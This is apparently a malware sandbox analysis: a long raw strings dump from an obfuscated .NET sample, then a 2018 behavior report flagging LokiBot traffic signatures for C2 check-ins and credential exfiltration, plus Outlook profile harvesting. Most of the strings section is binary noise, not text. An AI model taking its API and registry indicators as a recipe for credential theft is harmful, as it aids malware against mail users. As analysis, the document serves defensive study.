\t&z0
codeDomProvider_0
oLRHuW4ylfH2hQm2by
m_useUserOverride m_isInvariant
TjAQ
h%$@
fvuO8kfN3uxQ2cAQ2Tm
Q7G4AisZF6h4VmXj7Jm
A'D
j@SK{a
5{ uB
)ll.7u
-@ >
yO/y
L2F}
HM8@<y
P954OXfG007oaJaMI3K
qJ~b
3{D^
/rq`
?20R
=NTC}
j\"?j}
vG?]G
_br}f
>{nx
J%:,
gx12
*+n|
!AIg#\
A-0d
CodeDomProvider
4U`
I)r}
NA,H
rc&w
2Z$e6,o
IDV^#
Mms{e{5R
O@?04u.P
S?;JVM
T>HD(
NP2Iz
l ZY
cryptoStream_0
cyhnX
5}U-
Wvf-oj
AssemblyCopyrightAttribute
U+W?I
[ u@T)
[c?G
6AB?
]MGA1
,K_-
Yx-Sk
d(Bi
/0a+7
+SI2
classthis
)v'63
S1<B#
&}|`
d]`
E>)V6
4H'p:
JYugN
~OV
@948
^+u?y
Infinity
'/O#
W(X-}
da^ko
S )S
5s5e
Y 8
D"@p{
ee)'v
T[O\
}k}2
a/Oy
X#jx
{?89
oflG
FileShare
W">m
o p(
D` )
R`wR)
= +C +?#
RyRH#=
|vJ0
-o"yXK (
B* G
kW%k
pTt
]k4Y
X2O9
tn2-Y
5SA`x
Type
=^YG
|3B:%'
mlhaOqSZnoJKwQloog
|s2G
lhy^
Ad0xtZ
$Nm 0
tgVsq1flqupRYSvQcSc
xbA
X@"1Ay5
FdwB
G ih_
-Oj8
&+!E
&1^@
6i>r
7:b"
H({S
1hCp?
u O$c
.NETFramework,Version=v4.0
q1iFmqAtU`1
r]f^
gsj}
"`J,
gA J(u[!i
aR+o='
$ECv
H#:#o;
/|@]t
nSA
Gw>;<
W]:s
!Pqe
.ur$}
n.3=
- `Hu
Read
{AK<
J5VK
-Em+
0(r:
RIAwK3'=Ja
za{X
v >6
p,gJ
#2x.2v%
Z@ l5
n(\W
4=sK
value__
i"qo
]n__
5rCA
MenuCommand
TabCacheChildrenQuery
uka5qUO1GIEPpIDbysl
S+;0
*OcB
hdcSJwsAvVbeGEQRGmu
qWLM
T)5~V?
rRb}ED35
.kxE
)%tk
#kN>ow
>1 U
BglGP
W"Z%
xe ,
OjcR=
.#"e=
rRb}ED3&
FI5UxxOlQfJ9D5T4Q2u
gAMA
)|'h
yhQw
EmMTMAJK31P5CnaS8j
bS*Dk
O@v$
xTkX
{:Z?
S[[E(
p=A
;2mTb
F4U(
E[1{
Cdw+ad
8/YUW\
nq%o
u0,c
j7vgIcsxVbG4YcmBw3p
\^^+
n'{5$
yDKI7
.cctor
/1#}
AsyncCallback
ktUs
~5te
V]$UT
Gj|+
I5dVKQfWKRle5dZ350S
7mHqv
mscorlib
48Nze
,-r)
runtimeFieldHandle_0
%TB$
Av1.W
)Q7.
;g.g
"EPn
VariantWrapper
mkA
v?4
jWp-
JJ1K0<.
8gGuJI
T!'./
[5 K=
u}4e
b3fV
*cS&a
set_IncludeDebugInformation
9<g4h 5
E:ZaR
8B =
Oa8whvOQEXFaQqmaIha
2]XL
q
' +`
b98C
13DA
98O$=
GBjqBLMRgfBnCpQIN0
6&4*o
I")/
PSKTn
<ReadAsyncCore>d__30
c$^?>r
RSACryptoServiceProvider
'o!>
6$]-}
1h !
N"9~lM
~DNp}
6sHdG
@UN)
"lj?m
lj6QMwFRD3Amc6Dd1k
m81FBt8ia
*/_G
iiZD
,vkk]M
xfoBuUsz1xmiXtoPXGS
<=hE
}fVaOp
-!&#
2M@h
DayOfWeek
Bs;S9/
/=T73#@
E`_[
Oq4o
QqN1
IDX$rk
*
iN1}
*MY0
\2/f
qr}i
fsMRNRzg5E0ffvXLGr
638=j
QhniC7H52Poie5yoPE
method
ogi
PointHtmlWindowCollection
9a_hF
c^AZ
V*JW
2>7L=
Q$i
7.v
IxNr[
OMQZ
R*!tAH
h!G U_4
n3} G
B@vf
''i
wx<X
BQ*'Y
i6e
&L)Y
[8n=
uint_7
r9 b
y ]pv
{wt.|k
JsOtlLX
Z++
bG!0
E;WV
_JM)
{FhT
gtkZy8f1UhiuUZO4cNc
&7s
8!J
hZ i
h/F;iD
T OU
|ayREK
cV|D
int_6
int_5
m634jG2DF4iBM0kOxL
int_3
int_2
int_1
int_0
Fefm
-Y@@f
ESulFgObNQXxMrqCFp8
cY#.rhs<~
>K!P
iL)y
Tr6K
gJptcvOOsxD0Eyi2kKC
W'H7
:Tj)
v;GLW3~g
Bauc>jjX
nw
rIh5
-0ELj
Q*+P
iC[(
string_2
+%sE
string_1
&+L&
x9gY5Gf5yfiiMfRwbUy
AssemblyDescriptionAttribute
Y:Dn\U
IntPtr
Z.0<
b 8P
E^F+b0
-;&
Ns
byte_0
2^dh
Acos
PropertyTab
f/XW6
$$method0x6000007-1
J)5'`
iY/k1
HbYmsAOGOUgxv7BLsf3
IconSize
/j"oi[7
> (]
GG-m_
'x4@
OXf\
VrOSWNfDDNBB9Kni2dB
!xG?
jxH*U
Rfhn M
8.$Y
|+!p
7{7`
qzz{;
.Ss<[bC
percentDecimalSeparator
HI?"
'hp?
t4.+
.N7$
UZ\O
type_0
M<j
4PA<
S `h
p>9DH
-1c[
(H8f
(M(?
&HKK
C" ,
9Ef|6
SoAK
&+ #
\pW
s~v
n}j{uN
[%e^
IEND
$fbM_/
PV2s
.^Sq
WUMG
! ]'p $
=q{=
"NpZ
`?<
\f.&
RrWnlbCvu
nwa
|1X
&<qD
zZL
s.E1
)SB<
7A?
CFN>R~
pgxKVFOAE0qE56VHAhy
OdI=oQa[
!\b2
ktX8
get_Message
!This program cannot be run in DOS mode. $
}o%}[
callback
* OpZ
;"qEA
iAwH
File
=mr-y
ty2g22sM9eZRS0spDJf
NL]2
rGwu
xYGcv#_
>9+[p
SystemParameter
LtL|F2{
[fyV
,6+{
`iFZ
u\wu
Dispose
_H>
D1Vu
p%1h
<W/Q/m
:}I%}i1
irAsq
". l
q_#
wuA ;
V9ga
=N `Z
A+8o
k@H
q}hM
IyfJU0L4LPBB3QKiYq
ndt
W{3V
:m%5
p56x
fy]L
pS;
set_GenerateInMemory
kW]l
1 >
ResourceDirectory
yf61
\XQ:
WMDZ
qCOQjFfboXV6ga9x3TQ
b7\
1|EJ"
$$method0x600027b-1
okw^
Jkj
MyYd'
GetValue
ZHwK
#]:cT
G|~/
:4\>x
]j:2
Hs4
goa7XifPDggdGxweBba
j',[
$)V(
tw]<
?YQ2g
1:tj?
a^X<
we\}<~
Uq@<i4
)Zmn
?\n
@ ch
VVn4
@g 'h3
2F:!3
+Hou
?kP"
l'FX
zVc;
C.ao
BSJB
N ?k}
o\:*:
R5u-P
w':u
CU2W
]@1'HE
T01l9YsrWWPS62UXylQ
ZhC}~=
OO1)
/w3Hr
Y@M+
ij@
&o^|]
+S~m
ZQNO
ae8I
LKFB4'
n55+
gekvlYYlUZL06XmD9F
xb07
op_Inequality
K#6J6
Iedl
GetManifestResourceStream
qXGV[
"X7+
|)1|
y}Acp
cMxuvM
${@)
LJ*)
.{(%
?MS^
uMvQAZsDRhdQx1PJeJY
Ujjl
@ n7>8*
D!G
SRb@D
B\`U
,UF"-
w+pj
!J,-\
"]RL
]:je
MUJW1FroxCQ4ghaCNq
sTyE0
Tk?A
6`L_k
Fe ]l?
}1Fj
/:$4
9-8N
#MHrt:
^[gT
`O$x
*Ay{]qmGURcvc
System.Collections.Specialized
l6LM
Jj$#
pbd|k
gKQ-Y
qM^[
98Q6;
:9}y
C;yi3
2@?h
\fX]?
[<G`
ResolveMethod
RQ6
PQb)
VunpYLtxgAoJHMcFFN
' Pr
J v
'0HHL
ur>U
4_2hQ
Kh).
ld:'+
2tHq
wV]HH
k8^ 3
a&u.
S#]8
!kC()
HA(d
[`$
nXM~
\*Az4
nw6J
s> -"s
RijndaelManaged
Y2y!
c87_
rRb}ED3
m&a&
)N KR
IjxiElkR07GxpT2Kkn
<Y8%
GetName
TrayNotify
/>K57
CEX}Y%
,;XF
b{Sam
H(E?
Sz`]s=
Struct7
G|ED
s. Y|
Struct2
Struct3
Struct0
Struct1
(]#!
kcyz3
GetProperty
v&.'
WNih\
Fml
6^2fI2
|kQm
@1*`
PpB0Elfzx5CpfBSN12a
.E~>ig,
jaS;
% :m
m_useUserOverride
bool_3
_won
bool_1
bool_0
&+,&
bool_6
bool_5
bool_4
'm $+b:
3) 6GK
cU,}Xt
SignatureWriter
G^'4]
|.0Om
CtBBVKfJhXoZm3MYgie
h@fE
9%ko
d~Tny
-G0jw;
9M]r
BinaryReader
percentGroupSizespositiveSignnegativeSign
;:q4
PtX7yhsUK5f9pH1wV9H
R?;AP
o+Y}{
lY^T
cx 2
/?{
GBT'
^#PTR
gj
8SgH
)P89
yq-z
%;j^
`ia3
t|6$",
4aB{
Tl?
BsC3
zIev=.
aV01rcs2xRYEL9esxPQ
(P
oiDW
;9" J
Cosh
wlEnHBLalS9aRB43fy
8eHx
typemdt
EqO(
_>SR
=[s_
rpXI8EfexjnhFtecrnu
rY3831sGscxddSlwKFF
|([ L:>
`$"
S@(H
]kJ(
zR@3i%
`D!r
7M'L
}5 L&
Q*=|
8 4H=
GlHL
`C>b
pDrD
-*&
b~V3
CompilationRelaxationsAttribute
&*2(
VMciRL9ZcLqyPsstPk
3BV'
m_isReadOnlycompareInfo
m<44
o aB
percentNegativePattern
MemoryStream
sE4)A@
AAU
ToolStripDropDownClosedEventHandler
b\p/Rl
brX&
MoXK
Ns'P
NpQ@
Um)
6.iw
IDATS
wKDX
x%?(
`$,>
aQC31ofsK2Y101uECwK
dXz
GkP'
3nicu
YX;!SJkb
3 ?
Ge 1
Qfax
y(qK
!Oa*
qC'sK
7QY
G8vVK3fOxK3bkf8RVDZ
|)w
I"P
)d>~u
BaZE
(cFFE^
|L~{
]B~!]
QO)wd
l6l{8
Olc}A
q%1x
ez&G
[b1P
GVDxU2gyiuJMEcjp1R
^t?;R7
\Onw
Mx_
uXf
$+~_4
&Jxf
?ASd
Q%{y
0%%H8G
ifX?
Attribute0
i(&BF
6, ^?
OrvwxufYZfv5Tj4qJp1
e?3HP^S
Y 2LT
>Cb9
yteMBpNxyFkU
7_k
+{ln
'i?k
XkR2b
O"Bx
(hh
MwcN
hmkL
{u|!
!2YF"
I_WK<
\^QS
|wLp
Qc<4
0{679
q%1=
%Bd
)!`D
8+b2
.H/
v4>}
yFZROV
Struct6
zB)R.
H{@*
JuOq_
D[KB$
`y>A
#Db/
*8`a|
Struct4
\In1
bJ l
object_0
Struct5
N8>8
Brq*'
A' x@dU
Vj\B
q1'w
9/Ff
)_U\
5jM[e
K\\s
g769WZODbJA1aG7pQB8
sRgFtssYsTpOLk1kyTR
rRb}ED3)+
':^G
6%CG
,Q\l
hUKK}R
,4&
VLZ8
ER^EU
7vhx
0 _t.j
long_1
long_0
W^n(m
'*~w
s1ng
?.P\
Avck>
q%\
sS*p(
Ek}0
mcox
\Z"t5
zdFj
p7{d
p*:A
=>4u
B2zc8yiU
CSharpCodeProvider
memberInfo_0
eg_T
tKyICbrSaUyX
*]Z|
@[Zl
n8Bt
double_0
double_1
h^!(
p{vCB8)
7>JB
2}q
EO:MnI
GetPublicKeyToken
3A/ug
zn
bY;{
PBd<
K:KPo
System.Globalization.CultureInfo
wmP
49PO
EbaRr]un
method_6
"[Tm
CompilerGeneratedAttribute
~{4 LH
shaT
WX+oS
#@=Z
)@nW
Wf~
q|bYk
t[2~
EtF6
y3$
O*&r
8628w
X#}.
x_Rt
RT~o
}-|6
9dYy
^Qn,`
ze@FM
SX9
G 2G
b%|u
zeg
CO{!
-R%q
Copy
WOrA
Bh1aO`>8QcH
' F\N
<CL:
fYHr)1o
System.Text
M{%
get_Unicode
KDy/el
YVMG
ScrollOrientation
Q Z`
!npa^F
NJ2JZafHmWLMYnx8fNd
7yPQ
oi[|
v*4+8;
7@ui
5*CES
zgKvUhDHYilnBaLLGe
.=]
-g5]H
VVC&8
0Zy_
&+0E
[?Un j
flags
DwbmLSOx83VrZcYJJHx
m ]!u8
R&:
>,]`
8%j
*~6OW
knlgymor6WyIEKBhpG
;(_c_
Hj/c|"
fqp
tei
H4J"
o.O;
=`CF
} xx.
7Pg
vhG'U
Class9
Class6
HKb9gSwlc9gCofZdbq
Class4
Class5
Class2
Class3
Class0
Class1
N}D'
&io
@:I
!`ge
s[. v
'66
attribute_0
yhsdv3fnwLl8CW88IxI
TtlqMFDZo12LhNdUI6
=}F@e
E[-$9
t@gh%Z
E@J"
YoMTd
(#8I
, Z5
\s9pq
$$method0x600002a-1
$$method0x600002a-2
z>G-
wX8&i
wv5q
hNl}
)+Y+
P-&A
,AaTow'
Wz(b
zhxXwF3GT2sDu4OhRy
$ZO;m
<3JD
DP-O
pSFmd
UW^t
('6_A7]
Encoding
.?aB;R
T1Ftm6nLqUkeTKqyli
`XOC
jL}0
wCM06
zj&
M98H7
FieldInfo
}uG<
P"uIy
X|&
XVQ!{
<>g.
-0+.
:cp@
!-G@
( %
r.c)Z
7Gi`
*G/
PathList
mK+D
P4qa
zn62
PVT`
Jwm7w2OtepOjkJCb407
JW,T
^2j]
JStao
nYpvOQlRVp4yg7tUO9
SLl;
,E-'
0Aje
_CorExeMain
wo>
w.6p
H=3#
kf>
{Sp?
mWn68D-
t1WiJqscsBRKYoEw1Uo
H~_qQ!
WOlz>
.a>
.>DM
set_Key
usyn[2
byfH
h_<`s
g]Fi
PropertyInfo
G&Y&
'}M J
4'3:"
TKp.
DebuggingModes
InitializeArray
|`jR
[j5`4?Lq ni
`,e@l
2^'&u
d'8-
S-6y
GW )t$
FVqZ
B@!z 7
1ni\|
qgN]
sDR;
hU_
_m0ds
GHJ
<!Qw
GDY
kK 3g
pRT'
ToArray
KhY@
Ph82s^g
'ZEX
U~7~
{%l}
W tmz
mweY
dF'LZ%
` h MI\M
n4<B
uWax
E$rT
y7nqaHOahx84rFKIJuD
^wrI 1
Environment
D3AlpD\
!kBz
Z(C_#cn
B' <
2K|t
`Js
runtimeTypeHandle_0
iQDs
module_1
)xv:}
unT|P
CompilerParameters
w&&:
0O5
lrroMN
-ldqs
{xEW\
MKuk
rRb}ED3(+
\cw<0
dD^b5
(O%%Xh
G0CUA2O8vk8cPCZG6e3
EhgTe
4,kr
~uW`
sIq|!_
MXl3Haf6B3vjBNK6Qgl
}s$X(
l qD
MR;:
3]2]
PfH510exItW8NneGjo
|/Z=
}z5"]
,tC#
info
&`M^i
f$d5s
. Np
i {Ef
rbI]
Tj_1$
Attribute
+9MG
>LKR
=ryH
1}XzQ
P&!_
tUldu
V4M9
^dg
DXeL
w}*"O
_)<{
ubW/
ReadAllBytes
FlagsAttribute
(Dg2\^qF
aelkg
~=s$
BeginInvoke
3(pv\:,
e9sYG
exception_0
[ ;^
kIe
=Si2]~
jN6
W$k1ZB
![WrIB
NpD
DebuggableAttribute
>f$9
?FBr
WhCtuGfS6wNn22kPo9e
Mplj
}0\l
CallingConvention
0tcV
3y0LwkxXm9oSCsx74m.18veulde2xReYOYqo3
qcR=
Reverse
nd+0N
bM?
dGU2
$,Lk
NGGJ
nwB
c\ao
(:~@:n
w7q+g
n%:t-
"D!O
RuntimeHelpers
MdnkZWfaXMmFNnV1848
$0qfYc
k?T;dG
@?0E
h-ZM
*~US
uxVD
U=30
methodInfo_0
GM^i
z<cz
G @ x
x|)Oa
&2O
validForParseAsNumber
e
BWn$%
$$method0x6000020-2
109De
Q2"<^
R_\{
8P</
_`Jc
F6 ="
67(<
28C66gEdfyuxjXKM.exe
^Gv2
cO=0
1qKmTb
ed)Sx
'&Q-<+
mz]z[NYF
Object
j0[#9
lvwJ
P%=_a
|uURuuY
XzQ:9
.Y3(
2Vf
byte_1
Km2?
byte_3
byte_2
eK
byte_4
SNtG
LGnMM
\bU|
ComVisibleAttribute
]d\)"u
8/:O
*h|v
yNL;@+g6
C|fc
W&Ag
]A0k
s4^
npv)
SqlTceCipherInfoEntry
U={P/
jQ`b
{(Xj:GI
D*jX.
0A!(
=w7
*d>F
N+1 1o
U'
2vHG
ZQSX,
mg;<C
]Zk
l?@ %t
Ti?A=0
|)bgA
zL
z*KZ
tCBU
sh2e
AssemblyConfigurationAttribute
mG=
+xWy
QSystem.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
1N|(P
MethodInfo
A%$@[
f/'P
V^L7
?!8o
U9p?
F.sO
#I;
gyc8
)2;v$
Z-q(
WB&r
s<Z<
v;'h
[l3eOp
8s#y
h/(m
&+A&+w
fP"t6,
wt+ t
q:c>
s{Iz
]y*P
Hashtable
%System.Globalization.NumberFormatInfo"
2AP2
$UpWu
%[k
!w/f
2QZre
h]II
Bn-=G
(h,&
GYL4APf92JTvbWmQ4aI
g)Z
Appearance
~ch
TDcj
w c\frM
object_1
^q6'>
jQJLpts3HSFqDB9rr5P
RjZlOYskpkcyj9cwbNC
U<y@B
ApK/
A9ZnL
:UP!%F
(,}&
g)T!
Stream
fSystem.Drawing.Icon, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3ajSystem.CodeDom.MemberAttributes, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089mSystem.Globalization.CultureInfo, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089fSystem.Drawing.Size, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
=M8S
l'J0\Rm
HQmO
(m$'
J=q
sRGB
GL)gZPc
ReadBytes
pJt.
tBHmZDsVrLx0yR8PXnE
85z`H
hpnX
5{"n
TakeOrSkipQueryOperatorResults
U5 9
module_0
hN*Z
cUH
R7wT
*ADXQ
:c~6
3}'5
4+.4
SOnA/
nJ
Exit
2j~+A
||$
RK ?13
RrX0oWs1ESNTyWtWhWM
1'/9
e B
i><@J"
K)H7<
4'}
4,I]QQ
{6-C
t'i<
;0WI
(aZ
K#hw
+ufv&
6NjM
s%Cj
yJ|T
k{Mc
>o=
e?>
3X.U
W] k
j(U\
'6r8A
[3)
E)3{
JTh3B6s5Opt4XIOdWLL
]eM3
:jNj
c:K8
F8Ru:
$z@qN
%$D?Z
! &~
T25X3
K6VbrHfXi43maWqPt6Z
$M^5P\)
$]i(
T6VlUEO2tcNCjmAbbvC
cCs.
FtNE
3J-p
BI(g
*.r
percentDecimalDigits
\~{mvb
*ejt}jv[
>`9v
vuiY
XQFnLQsCeqa4lGOdbur
wEZ9]
|R; /
.NET Framework 4
TeFn5P
8QF"
gq_x
Iq(c
j,<3n
{/p^oL
Y+ye
n>f
oe56RSsiy6e3Wum67oH
}"<>
r5k6
Z yh
tFFs9PslbAMcTgAWFMn
a1|
N\ >
-C^8
NGatnThALYC8d4jDwF
$NX@q3
fmV%
]pUf
2Rj=
SUFG
0[q3
|b:$
<U;E
fK1z{9
(.n
DE z
5uP^
2IJP
D<\r
JfLeK
?Zvto
MVYKLxurvhZFtxH5sG
CAPINative
{;4L4
T) w
@KW
$FM-
X"M,
L35)\
aDTYDRfV4S8SoNVVhAu
rwpNQxPD3y2bDEZNqY
"y<J@
;K{ur
#I,<5
j/'8-
x q9
qv1V3
I:dm
ValueType
ZeVA
yr;P
]<'
=fM8
*p:=
?+6J
Y!JT
QZ^&
CryptoConfig
fV&
85HW5U
6>=
n/+]V
J-1i
pv[&
'7 J
nKb
AGdb
m,gTV
|!ZH
@$"
:vQz1
_y.j
dn/
K01l
(@ px8j
9p5W
1>U
2bb
*&?"(
GhA\
B)bG
}YgxF
j=2
$[pIG
^}qM
AesCryptoServiceProvider
CL];
1Jzh~
-F&
xN+:{p
8e:\
1Q;#
,hVa
t^s %)
K}E`
,M=.
.j X
{c
cp9`
;#ZN3
9|YK
&+Q
o3cLFCfgo61ELpD1nms
*1EL
{YZS
T(1P
As:N
<F,T
s8ji
:YMK
=u0HC
Lh~Kq
+E-2
;qCr
DrueQZsEV8e1MSawJjf
=cm6Hl~
(!*
!hAbM
o1Gi8
lbIO/
B9'$z
91s&
F/hp]
N 9zs
T58]|
B4=hY
^ynV[].
cipherMode_0
9T|
InternalAccessibleObject
~D+?
M"[
cMNj3gBLIi6lpC2bhN
Tl64
~p~~>R
:fT>lB>D
Class10
"<ErI
yxZ53YfxUqBisa7il3q
!5W>
K?AR
~Hj8
;o!HtOc
Q7uEdqUTO9brEffSWu
NAc7a
kRXBCBfMKBg9T9ENlUk
VS@@
qCII=
*Q]x{
%}[%
:Z?<
Fgsk
"JBx<,
6+<#
4>4Q
}wWr
|2+\
R|O
VP0
Avt,
dO7.`
kxt"
qi~H
^+a R
0Dh/
q: ;
FH"A
#Z!"
k~x}C
REfEkcCx25uXSKYtea
[l/rx
a7-
qi|c8
negativeInfinitySymbol
48N@
1*)1
+jlr
8c}:
/>5JD
p[?1
YDW91
V-M"P
czq[:
-i9d
jU|KK
&+/&
>Q]hM
2)hE
Exception
tbbO
(}\S?
yNDs
5'Ow
QN v
JEMY
D5M5QYsRfOETpSgvPiF
c2W|
Bf*3
,Gvv
FFW[h
! e{m?
(o&|o
oXMfNvfjHfeb8KiTb5l
D6fohY6WtDPQApLuYW
C2trX`'s
`OC
"H b
=b"4
K3zW5
&xvw
3< E
j.f;
nI:m
N#>C
GetTypeFromHandle
IAsyncResult
nWiNELs9VUEHXGWLXL5
Dr=*
CreateDecryptor
o.;Lc
L1#/=
SymmetricAlgorithm
System.Runtime.Remoting
_yf
\u-
_@l)X
T dQ
U]f\
E(\f
percentPositivePattern
.y r
ReadLine
aR31
=Q6
s^Cv
!&O)%
ansiCurrencySymbol nanSymbol
, tn
Ei=@
g]w$0
*35P*
5y[m7
kBKy0
U~R`]x
ComputeHash
KugZMfnE6Dc6E3oxlh
j[\VG".
.iJz^M
biy weSIuG
,/{h
%-c(
9 KdKL
RNbO0
:Mg2<
Qwi"(
aUrsXcmJ _5
g&:[}
YRI
$g(g
_V/8
)&!q
[8O@
YJlg4
C|hZB
Wyf-
UB
NNqp
P&22
FileAccess
+@cC
8 %x
~Or2
/>$
set_Position
OoLf
iNds~
+YrT
b{x5
KATTknspO4RGPtCHagO
j,kQ
?SR'
C O]}
:,v
'zx:@
Vs-3
System.Runtime.InteropServices
N(=:
|d_
>| w
<K8A<
vT2
u'>\
%gKa
ZaE]CA
Math
UnmanagedFunctionPointerAttribute
-Infinity
W0@}
J;XG
QQU:
y+(U
LL?:
jfe.
fZ5Z]!
r!X>m
.<t!S\
Y8# m)==J
AKMr
+?#
HGbQn'
eyF4
i
QC}}
~':C
symmetricAlgorithm_0
<i|
08!>
D2EQ
}q%i
$\\)
System.Runtime.CompilerServices
%JpV
LzB@D
`u{g
:H4
Q]&Q\{-
o\mC
6Z@"
tY1y)
rk./
C5Z/
WhIL
r"RO
*TS[P
cBVh
r"wOA
}8P?B
014t
v]P7{LwA
*
gjiTtAf3mbuVvJHP6xl
&*2(
w1Uz
;rAOG
&akGH^
ICf
vLkl
t-^.
SVDr
bool_2
tE2<
Au_`
hsxZ
i~GX
d;cL5o[
UK{,
QYaH2zO
9isk
fQVb
k8x@G$
ufq{
N 3U
/WC
Ocp@L|\
`l`:
BZCr
R3I<{
-M&+y
%QwT
ByIjN=
j2aj*
1r>
zWP.
W{6NVv
-4/*
"ekTu
^K3O
w#HD
72Lf"
&oPG3Z
R2d"s
6d!)
Close
f`aX
-X q0=
iB3eYwfwmaXJVB9Lvvp
bi>kT7+
IDisposable
xsGe
6,s*
to#
V-v$
tB[/
1IF-
Li@[
set_IV
}gPtT
uVA[T
<SeI
%;-9
Ix>2
CJSt
currencyGroupSizes
w]#Z
m9 _
)aCj
{j1
set_Mode
Ljm#&
W'HE
3Bfv2
MYT]
Q$"#
lU[7q
FA6mnxOyyOUFLoOWCi9
Yb_2
</P"}"
):Hra
qemw
=SSf
AssemblyProductAttribute
Rqr1HP8ARTCHnL2BTV
zK[}
<[.J
@KCwK
,yKZ
6VS
h8:
AvG%a`
?nX/
7a-Rl
+rRZG
opaX
Jvy"]
0i@OX
LY6>
<Module>
akDsN
U"v;2
*F{A5NL
[gl-
F:4e
( L
TH?6
Yn4^
tVgK8dswqNlEm35Q2sx
1w4\
pjQTBnfcUag7LYWgsFo
MulticastDelegate
q"w
VcZ?7s
BbFt
Jg61a
61]\M
l@HDI:
&j%_
h7lYMCfEswpfHOnEh3l
jKaa]=
I&+BH
2;"WyP
c\I
48y('
YP#t
E; "-
B?1$
e#k_
IOoEA
N8wh5
<)[vA
`'(v(
+*4me
uint_3
uint_2
uint_1
uint_0
$2r{C$
uint_6
{m{0
uint_4
sq\9v]
>]p]
ld30
XAOmrRZC1QDB3xhn0i
1Jo$
goV^
DkgrN0stAwu0vrdFIQX
IClrStrongName
A|J4
75j^
p5?o
GMom
sFey+
3iC#
iA.r
h5mj
\7f
jR&d
Xr;!(v
vOk'
P%5pg
Q~0(
CreateEncryptor
;~g7
e%8~
%} /'
currencyDecimalDigits
e 'W
nativeEntry
#GUID
qv'
;VtF
7h6u
assembly_0
R7q$
\d/GJ
f Y@iL
I/0O
?SKH_-
$+'F
TdA/Him
:[Yr
sIQz
y5OZjhNtLjjw8a3I69
ML`8
rJ$q
+@h!
T`@^
9vKw
V"(
[(=:v5
G\4K~(
DataGridViewAutoSizeRowsModeInternal
4 =-
!e2w
yre
r qnQ
< c|
7S"s
zOJn.
G+z;
Y,MQ
}5 ^
ogW~
91^e
PnnZ
hxfq
:~{l
D89.
TO #
=$ok=Z
kJ)
0`zm
E2{9
&WP#
K2"2
Nullable`1
ShwIyREPlqyTuaWV93
4P;dq
S#p}1
5q'!
PuOPkZSCEyMLq1ARdi
lquZA
/#Ob
^E^ b
c OCV
5?-S
<' e
paC^|
gjuPhycIP
#/)N
System.Globalization.TextInfo
!?MZ
V5p
get_HasValue
[j-T
= v28
$L!
E:{#
SqlColumnEncryptionCertificateStoreProvider
{$Y8
Sb/1
8vVQ
">=
M[y{O3]
K9L]
oCETmOs4us5wPKowhGv
bp3a
SetValue
W# K
hE71XfsJ7He4UWCUQj9
+p,Ra
+ <3
&-\UE8
OvV<
/|Wg
cdomimsSA0nZaTZEFnY
xYEN6aBgsh6UH
h!p=
qG}Y?
'Wy^5
GetFields
~1b2K
;!6*
,bp?
KY%n
System.Globalization.SortVersion
t wO
Y}'H
calendar m_dataItem cultureID
:]8.
EjnN6aBBTV3sh
;s;b
?liEk
Th@
tq/^;"6
kk|gv#H
tU;>
t bN-
G<bh
3DCR
q-5
o3Fv
zSg}?
L\c<mX
-F+
`NfSs
/m{#
bNj
iiLR
kt9L
kMY3
8N@A>
RawImplMapRow
O_r
.zj
?I{4
\ v6
s9D"
K{2+;
v'[zY
@OhWxy`A5.
\~pnP
-|, k
8&SM
)x>0
EbYw
a8I3r9fCrAhv4jCecq4
+mfR
}E0 \
Zero
QWhGs0axFNYsuIO2sl
qIxNu
/!$S
P;G#>rA
e8 S
r+.t
MmEk
!.PND
1i++
hod*
?Leo'
;=MxT>u
km>d
3XJ?
3s4K
rajs
HJVUC
P1Q7LGfmI4KcIOsv81l
Aj,[
pE=Y
d\5w
\sTBT|
Kg955Psy34m9ckraHBP
vsm}
9]+
vI<n
HashAlgorithm
VHUL
_1\{v
wN8@
m~$X
}24%mrr).
TYQ
nDZh
Z"X-
RV>hf
Fs)6=
G 1
l($a
9,E?
>; /5
V0Ib7
[tW
R}v:`B
PlIG
IRgRMTbM4adRCmkSu3
'#OZ
d]m'
wA383jsWUTmWaC8xoHc
r*P
Lx&
tu f
VV'&/ W
>0Y}
mPW\
UAdm1awyuxponBElIs
m"|O
H{j~
r='/u{g
F$`=
<[c}Kp
<ParseDtdFromParserContextAsync>d__152
N8EwWhyZWCFq1Cquun
a1#1XE
S}amz
;3dx
#2mt
3VU*
YC}c
1*b-K
$$d"I
N]g
e][3
F'Bn
, &(V
4bKC
uint_5
WriteLine
M& J^tu
/H$
Pg:c
customCultureNamem_nDataItem
?_d
_399
hd *
Q|X<
GetMethod
U"b6
0BO"
pbW
1Lp R
Oa)m
Xa^P
*;ct
eQZui2^W
gBaA
S&/ZY
VJPtmXmPohEIBjKg1e
r,_m
a\Rr
+2~
UD4
elD3Y
ZIv|8
UPLEDVOi44QpIAuSNEn
&7WH
GDNz
8NPU
NTw'
UEDOetXhWus76oygPv
J49oqdOcWiPeeM4tm2B
MRMDictionary
H?/^
\*n/
thUQ
H}wRi
Psk7e8snDVOKG5Re03W
@ F(
QCjITFvSFKot45HnCw
RUmx
Unwrap
8O6|
su Q
T_&):
\9uf
[K\$
n,Gc
"YmH
-bRf
Behavior analysis details | |||||
---|---|---|---|---|---|
Machine name | Machine label | Machine manager | Started | Ended | Duration |
Seven04b_64 | Seven04b_64 | VirtualBox | 2018-06-30 16:55:30 | 2018-06-30 16:58:41 | 191 |
14 Behaviors detected by system signatures
Created network traffic indicative of malicious activity
Severity: High
Confidence: High
- signature: ET TROJAN LokiBot User-Agent (Charon/Inferno)
- signature: ET TROJAN LokiBot Checkin
- signature: ET TROJAN LokiBot Request for C2 Commands Detected M2
- signature: ET TROJAN LokiBot Request for C2 Commands Detected M1
- signature: ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1
- signature: ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2
Anomalous binary characteristics
Severity: High
Confidence: High
- anomaly: Actual checksum does not match that reported in PE header
Collects information to fingerprint the system
Severity: High
Confidence: High
Harvests information related to installed mail clients
Severity: High
Confidence: Very High
- key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
